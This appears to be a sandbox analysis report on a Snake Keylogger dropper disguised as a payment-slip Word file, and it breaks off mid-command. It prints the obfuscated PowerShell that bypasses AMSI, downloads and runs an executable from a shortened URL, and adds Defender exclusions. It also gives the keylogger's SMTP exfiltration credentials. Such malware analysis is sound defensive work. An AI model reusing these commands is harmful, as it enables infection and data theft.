snakekeylogger | 8dead61d3783e37eef1dc2062acd13670f59da4f0dab124d533dd4d684b3ed60

Analysis

max time kernel
30s
max time network
143s
platform
windows10_x64
resource
win10v20201028
submitted
08-04-2021 06:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment Slip ETL_050_6380247.doc
Size

824KB
MD5

a68f53e59383050cf5c0f92ac964dfb1
SHA1

43a1afe645d5f828b991785f2f9e8e9833063ed3
SHA256

8dead61d3783e37eef1dc2062acd13670f59da4f0dab124d533dd4d684b3ed60
SHA512

e67053a81a7a9c52c2fda7435b9cef4f52ad658cce1aedd95715f1d63ca0f9717e0eb8fbbc5b061d3f764f5388604841189907821366122d83f93266eaa76cc4

Score

10^/10

snakekeylogger evasion keylogger stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://bit.ly/3uqfHTI

Extracted

Family

snakekeylogger

Credentials

Protocol: smtp
Host:
nobettwo.xyz
Port:
587
Username:
bal@nobettwo.xyz
Password:
KvgnCIGBE8+H

Signatures

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	676	3344	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	4424	1332	powershell.exe	EXCEL.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1628	2648	powershell.exe	EXCEL.EXE

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger Payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1400-1170-0x0000000000400000-0x000000000046A000-memory.dmp	family_snakekeylogger

Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

23 676 powershell.exe
25 676 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

99864.exe99864.exe

pid process

4380 99864.exe
1920 99864.exe

flow	pid	process
23	676	powershell.exe
25	676	powershell.exe

pid	process
4380	99864.exe
1920	99864.exe

Windows security modification 2 TTPs 4 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

99864.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	99864.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	99864.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe = "0"	99864.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\99864.exe = "0"	99864.exe

Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

49 checkip.dyndns.org
52 freegeoip.app
53 freegeoip.app
81 freegeoip.app

flow	ioc
49	checkip.dyndns.org
52	freegeoip.app
53	freegeoip.app
81	freegeoip.app

Drops file in Windows directory 2 IoCs

Processes:

99864.exe

description	ioc	process
File created	C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	99864.exe
File opened for modification	C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe	99864.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1552 1920 WerFault.exe 99864.exe
2088 4380 WerFault.exe 99864.exe
2864 5344 WerFault.exe 99864.exe

pid	pid_target	process	target process
1552	1920	WerFault.exe	99864.exe
2088	4380	WerFault.exe	99864.exe
2864	5344	WerFault.exe	99864.exe

Checks processor information in registry 2 TTPs 15 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

excelcnv.exeWINWORD.EXEEXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	excelcnv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

888 timeout.exe
6576 timeout.exe

pid	process
888	timeout.exe
6576	timeout.exe

Enumerates system info in registry 2 TTPs 15 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXEexcelcnv.exeEXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	excelcnv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	excelcnv.exe

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

4640 WINWORD.EXE
4640 WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 49 IoCs

Processes:

powershell.exepowershell.exeWerFault.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
676	powershell.exe
676	powershell.exe
676	powershell.exe
4424	powershell.exe
4424	powershell.exe
4424	powershell.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1552	WerFault.exe
1628	powershell.exe
1628	powershell.exe
1628	powershell.exe
3824	powershell.exe
3824	powershell.exe
1524	powershell.exe
1524	powershell.exe
1140	powershell.exe
1140	powershell.exe
3824	powershell.exe
1140	powershell.exe
1524	powershell.exe
1524	powershell.exe
1140	powershell.exe
3824	powershell.exe
3076	powershell.exe
3076	powershell.exe
2476	powershell.exe
2476	powershell.exe
2564	powershell.exe
2564	powershell.exe
3076	powershell.exe
2476	powershell.exe
2564	powershell.exe
3076	powershell.exe
2476	powershell.exe
2564	powershell.exe

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exepowershell.exe99864.exeWerFault.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	4424	powershell.exe
Token: SeDebugPrivilege	4380	99864.exe
Token: SeRestorePrivilege	1552	WerFault.exe
Token: SeBackupPrivilege	1552	WerFault.exe
Token: SeDebugPrivilege	1552	WerFault.exe
Token: SeDebugPrivilege	1628	powershell.exe
Token: SeDebugPrivilege	3824	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	1140	powershell.exe
Token: SeDebugPrivilege	3076	powershell.exe
Token: SeDebugPrivilege	2476	powershell.exe
Token: SeDebugPrivilege	2564	powershell.exe

Suspicious use of SetWindowsHookEx 20 IoCs

Processes:

WINWORD.EXEEXCEL.EXEexcelcnv.exe

pid	process
4640	WINWORD.EXE
4640	WINWORD.EXE
4640	WINWORD.EXE
3344	EXCEL.EXE
3344	EXCEL.EXE
3344	EXCEL.EXE
3344	EXCEL.EXE
1332
1332
1332
1332
2648
2648
2648
2648
4068	excelcnv.exe
4640	WINWORD.EXE
4640	WINWORD.EXE
4640	WINWORD.EXE
4640	WINWORD.EXE

Suspicious use of WriteProcessMemory 39 IoCs

Processes:

EXCEL.EXEpowershell.exepowershell.exe99864.exe

description	pid	process	target process
PID 3344 wrote to memory of 676	3344	EXCEL.EXE	powershell.exe
PID 3344 wrote to memory of 676	3344	EXCEL.EXE	powershell.exe
PID 676 wrote to memory of 4380	676	powershell.exe	99864.exe
PID 676 wrote to memory of 4380	676	powershell.exe	99864.exe
PID 676 wrote to memory of 4380	676	powershell.exe	99864.exe
PID 1332 wrote to memory of 4424	1332		powershell.exe
PID 1332 wrote to memory of 4424	1332		powershell.exe
PID 4424 wrote to memory of 1920	4424	powershell.exe	99864.exe
PID 4424 wrote to memory of 1920	4424	powershell.exe	99864.exe
PID 4424 wrote to memory of 1920	4424	powershell.exe	99864.exe
PID 2648 wrote to memory of 1628	2648		powershell.exe
PID 2648 wrote to memory of 1628	2648		powershell.exe
PID 4380 wrote to memory of 3824	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 3824	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 3824	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 1524	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 1524	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 1524	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 1140	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 1140	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 1140	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 3076	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 3076	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 3076	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 2476	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 2476	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 2476	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 2564	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 2564	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 2564	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 4400	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 4400	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 4400	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 2108	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 2108	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 2108	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 196	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 196	4380	99864.exe	powershell.exe
PID 4380 wrote to memory of 196	4380	99864.exe	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Payment Slip ETL_050_6380247.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4640

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $FXEEWNeAIhqilyjV=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,86,86,75,75,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,57,48,55,54,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,86,86,75,75,41,59,125,101,108,115,101,32,123,125,59);[System.Text.Encoding]::ASCII.GetString($FXEEWNeAIhqilyjV)|IEX; (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE( ”http://bit.ly/3uqfHTI ” , ”$ENv:teMp\99864.exe” ) ; stARt ”$ENv:tEMP\99864.exe”
2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:676

C:\Users\Admin\AppData\Local\Temp\99864.exe
"C:\Users\Admin\AppData\Local\Temp\99864.exe"
3⤵
- Executes dropped EXE
- Windows security modification
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4380

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:4400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:2108

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:5640

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:5728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:5844

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:5244

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:5292

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:5372

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6524

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:6656

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6988

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:4412

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:6224

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:7800

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:7860

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:7920

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:7704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:7808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:8000

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:7944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\99864.exe" -Force
4⤵
PID:6868

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Cursors\WQzhTjfBsYrOnkh\svchost.exe" -Force
4⤵
PID:5648

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
4⤵
PID:5716

C:\Windows\SysWOW64\timeout.exe
timeout 1
5⤵
- Delays execution with timeout.exe
PID:888

C:\Users\Admin\AppData\Local\Temp\99864.exe
"C:\Users\Admin\AppData\Local\Temp\99864.exe"
4⤵
PID:1400

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 2908
4⤵
- Program crash
PID:2088

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
PID:1332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $FXEEWNeAIhqilyjV=@(91,100,111,117,98,108,101,93,36,111,115,118,101,114,32,61,32,91,115,116,114,105,110,103,93,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,97,106,111,114,32,43,32,39,46,39,32,43,32,91,101,110,118,105,114,111,110,109,101,110,116,93,58,58,79,83,86,101,114,115,105,111,110,46,86,101,114,115,105,111,110,46,109,105,110,111,114,59,105,102,32,40,36,111,115,118,101,114,32,45,103,101,32,49,48,46,48,41,32,123,101,99,104,111,32,87,105,110,100,111,119,115,49,48,59,36,86,86,75,75,61,91,83,121,115,116,101,109,46,82,117,110,116,105,109,101,46,73,110,116,101,114,111,112,83,101,114,118,105,99,101,115,46,77,97,114,115,104,97,108,93,58,58,65,108,108,111,99,72,71,108,111,98,97,108,40,40,57,48,55,54,41,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,83,101,115,115,105,111,110,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,36,110,117,108,108,41,59,91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,34,83,121,115,116,101,109,46,77,97,110,97,103,101,109,101,110,116,46,65,117,116,111,109,97,116,105,111,110,46,36,40,91,115,121,83,116,69,109,46,110,101,116,46,119,69,66,117,116,105,108,105,84,89,93,58,58,104,84,109,76,100,69,99,111,68,101,40,39,38,35,54,53,59,38,35,49,48,57,59,38,35,49,49,53,59,38,35,49,48,53,59,39,41,41,85,116,105,108,115,34,41,46,71,101,116,70,105,101,108,100,40,34,36,40,91,99,72,97,82,93,40,57,55,41,43,91,99,104,65,114,93,40,49,48,57,41,43,91,99,104,97,114,93,40,56,54,43,50,57,41,43,91,99,104,97,82,93,40,49,48,53,41,41,67,111,110,116,101,120,116,34,44,32,34,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,34,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,32,91,73,110,116,80,116,114,93,36,86,86,75,75,41,59,125,101,108,115,101,32,123,125,59);[System.Text.Encoding]::ASCII.GetString($FXEEWNeAIhqilyjV)|IEX; (NEw-objEct 